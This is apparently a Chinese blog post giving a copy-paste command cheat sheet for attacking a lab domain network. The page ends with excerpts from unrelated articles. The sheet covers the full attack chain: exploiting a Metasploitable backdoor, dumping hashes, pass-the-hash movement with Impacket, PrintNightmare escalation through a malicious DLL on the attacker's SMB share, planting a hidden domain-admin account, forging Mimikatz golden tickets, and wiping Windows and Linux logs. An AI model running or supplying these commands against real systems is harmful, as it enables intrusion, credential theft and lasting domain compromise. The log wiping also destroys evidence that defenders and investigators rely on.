news 2026/5/1 6:11:45

内网渗透靶场实操命令速查表

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
内网渗透靶场实操命令速查表

本速查表基于之前的Vulhub+Metasploitable 2 靶场实操清单,涵盖从外网突破到持久化的全流程命令,可直接复制执行。

环境说明:攻击机 Kali(192.168.56.101)、跳板机 Metasploitable 2(192.168.56.102)、域控制器(192.168.56.103)、域内主机(192.168.56.104

一、 外网突破:获取跳板机权限

1. 端口扫描与漏洞发现

bash

运行

# nmap 全端口版本扫描 nmap -sV -p- 192.168.56.102 # 搜索 UnrealIRCd 漏洞模块(msfconsole 内执行) msfconsole search unrealircd use exploit/unix/irc/unrealircd_3281_backdoor set RHOSTS 192.168.56.102 run

2. 获取 Meterpreter 会话后基础操作

bash

运行

# 查看跳板机系统信息 sysinfo # 切换到系统 shell shell # 后台挂起会话(返回 msfconsole) background

二、 内网信息收集

1. 内网存活主机探测

bash

运行

# Meterpreter 内执行 ping 扫描 run post/multi/gather/ping_sweep RHOSTS=192.168.56.0/24 # 手动 ARP 扫描(Kali 本机执行) arp-scan -l # 扫描当前网段 fping -g 192.168.56.0/24 # 批量 ping 探测

2. 域环境信息枚举

bash

运行

# 检测是否存在域(跳板机 shell 内执行) ipconfig /all # 查看 DNS 后缀 net config workstation # 查询域控制器列表 nltest /dclist:test.com # Impacket 工具查询域用户(Kali 执行) python3 /usr/share/doc/python3-impacket/examples/net.py user /domain -target-ip 192.168.56.103 # BloodHound 可视化域权限(Kali 执行) bloodhound # 启动工具,导入域信息

3. 主机详细信息收集

系统类型核心命令
Windowssysteminfo(系统补丁)netstat -ano(网络连接)tasklist /svc(进程服务)
Linuxuname -a(内核版本)ps -ef(进程)find / -perm -u+s -type f 2>/dev/null(SUID 文件)

三、 横向移动:哈希传递攻击(PTH)

1. 提取目标用户哈希

bash

运行

# Windows 主机哈希提取(Meterpreter 内) run post/windows/gather/hashdump # Linux 主机凭证扫描(跳板机 shell 内) wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh chmod +x linpeas.sh ./linpeas.sh

2. Impacket PTH 横向移动(Kali 执行)

bash

运行

# 格式:psexec.py 域名/用户名@目标IP -hashes LM哈希:NTLM哈希 python3 /usr/share/doc/python3-impacket/examples/psexec.py test.com/user1@192.168.56.104 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef # 若获取明文密码,直接登录 WinRM evil-winrm -i 192.168.56.104 -u user1 -p P@ssw0rd!

四、 权限提升:PrintNightmare 漏洞利用

1. 攻击机准备恶意 DLL 与 SMB 共享

bash

运行

# 下载漏洞利用脚本 git clone https://github.com/cube0x0/CVE-2021-34527.git cd CVE-2021-34527 # 启动 SMB 共享(供靶机下载 DLL) impacket-smbserver share . -smb2support

2. 靶机执行提权命令(Windows 10 主机 shell 内)

cmd

# 挂载攻击机 SMB 共享 net use \\192.168.56.101\share # 执行提权脚本,获取 SYSTEM 权限 CVE-2021-34527.exe \\192.168.56.101\share\malicious.dll

五、 持久化:域内留后门

1. 创建隐藏域管理员账户

cmd

# 在域控制器执行,创建带 $ 隐藏账户 net user hidden_admin P@ssw0rd! /add /domain net group "Domain Admins" hidden_admin /add /domain

2. 生成黄金票据(Mimikatz 执行)

bash

运行

# 提取 KRBTGT 账户哈希 mimikatz.exe "lsadump::lsa /inject /name:krbtgt" exit # 生成黄金票据(替换 SID 和哈希值) mimikatz.exe "kerberos::golden /domain:test.com /sid:S-1-5-21-xxxxxx /krbtgt:哈希值 /user:backdoor /ptt" exit

六、 痕迹清理

1. Windows 日志清理

cmd

# 清空系统、安全、应用日志 wevtutil cl System wevtutil cl Security wevtutil cl Application

2. Linux 日志清理

bash

运行

# 清空 SSH 登录日志和系统日志 echo "" > /var/log/auth.log echo "" > /var/log/syslog # 清空命令历史记录 history -c && history -w

七、 常用工具命令速查

工具用途命令
Impacket 横向移动python3 wmiexec.py test.com/admin@192.168.56.104 -hashes 哈希值
密码哈希破解john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
端口扫描masscan 192.168.56.0/24 -p 135,445,3389 --rate=1000
提权扫描./PrivescCheck.ps1(Windows)./linpeas.sh(Linux)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/23 15:36:49

基于 HTML5 Canvas 的终端日志流可视化实现(支持多 Pane / 运维模式)

在日常运维、演示或监控系统中,我们经常需要一种**“像真实终端一样滚动的日志界面”**,用于: 运维大屏 / NOC 展示Demo / 产品演示系统状态背景动画DevOps / 云原生场景模拟 本文将完整解析一个基于 HTML Canvas 的终端日志流可视化方案&am…

作者头像 李华
网站建设 2026/5/1 4:50:24

深入理解C#抽象类与虚方法

抽象类和虚方法一,抽象类1,抽象类: 用于提供类的部分成员实现 动态多态表现:抽象 2,抽象类包含抽象方法也可以是普通方法 ,如果抽象方法不用去实现,谁继承这个抽象谁去实现抽象方法3&#x…

作者头像 李华
网站建设 2026/4/30 17:09:57

国密内网IP是什么?

国密内网IP证书的定义国密内网IP证书是一种基于国家密码管理局(SM系列算法)标准的内网IP地址加密证书,主要用于保障内网通信的安全性和身份认证。这类证书采用国产密码算法(如SM2、SM3、SM4),符合国家信息安…

作者头像 李华
网站建设 2026/4/27 5:11:06

轻量、高敏、高刚:BOTA传感器为UR机械臂注入力觉智能

让 UR 机器人“感知”力:BOTA 六维力控套件为科研提供开箱即用的力觉平台 在人机协作、柔顺控制或具身智能研究中,一个基础却关键的问题是:如何获得稳定、可复现的力反馈? BOTA 推出专为 UR 协作机器人设计的力控套件 F/T Senso…

作者头像 李华
网站建设 2026/4/27 9:55:13

多路定制化电源模块测试解决方案案例-纳米软件

一、案例摘要 本案例聚焦成都某专业生产电源模块的电子企业,该企业采用 “成都生产 重庆研发” 的跨地运营模式,核心产品为多路定制电源模块。由于产品定制化程度高,企业目前依赖手动测试导致效率低下,且研发与生产两地测试数据不…

作者头像 李华
网站建设 2026/4/29 11:49:28

Vue 3 CSS中的v-bind()完全指南:让样式真正响应式

Vue 3 CSS中的v-bind()完全指南:让样式真正响应式 忘掉繁琐的类名切换,Vue 3的v-bind()函数让你在CSS中直接使用JavaScript响应式变量,实现真正动态的样式系统。 1. 什么是CSS中的v-bind()? Vue 3.2+ 引入了一个革命性的功能:在CSS中直接使用响应式数据。这意味着你可以在…

作者头像 李华